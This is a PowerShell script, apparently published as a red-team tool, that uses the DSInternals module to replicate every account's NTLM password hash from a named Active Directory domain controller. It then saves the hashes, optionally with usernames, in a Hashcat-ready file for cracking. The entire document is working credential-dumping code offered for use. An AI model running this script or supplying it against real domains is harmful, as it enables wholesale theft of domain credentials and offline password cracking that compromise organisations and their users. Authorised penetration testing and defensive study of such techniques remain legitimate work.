Extract-DsInternalsHash.ps1
|
<#PSScriptInfo
.VERSION 1.7 .GUID ff919e16-8346-42ed-8cc9-88abdfebf806 .AUTHOR Kalichuza .COMPANYNAME .COPYRIGHT .TAGS .LICENSEURI .PROJECTURI .ICONURI .EXTERNALMODULEDEPENDENCIES .REQUIREDSCRIPTS .EXTERNALSCRIPTDEPENDENCIES .RELEASENOTES .PRIVATEDATA #> #Requires -Module DSInternals <# .DESCRIPTION RedTeam Tool that utilizes DSInternals module to extract user domain password hashes. #> param ( [Parameter(Mandatory=$true)] [string]$DomainController, [switch]$HashCat, [switch]$IncludeUsernames ) Import-Module DSInternals try { # Extract NTLM hashes and convert them to hexadecimal format $accounts = Get-ADReplAccount -All -Server $DomainController | Where-Object { $_.NTHash } | ForEach-Object { $hashHex = ($_.NTHash | ForEach-Object { $_.ToString("X2") }) -join '' [PSCustomObject]@{ SamAccountName = $_.SamAccountName NTHashHex = $hashHex } } # Check if the HashCat switch is used if ($HashCat) { # Path to save the output for Hashcat $outputPath = "hashcat_ntlm_hashes.txt" # Check if IncludeUsernames switch is used and prepare output accordingly if ($IncludeUsernames) { $accounts | ForEach-Object { "$($_.NTHashHex):$($_.SamAccountName)" } | Out-File -FilePath $outputPath -Encoding ASCII } else { $accounts | ForEach-Object { $_.NTHashHex } | Out-File -FilePath $outputPath -Encoding ASCII } Write-Host "Hashes have been saved to $outputPath in Hashcat format." } else { # Display the output in a table format if the HashCat switch is not used $accounts | Format-Table -AutoSize } } catch { Write-Host "An error occurred: $_" } |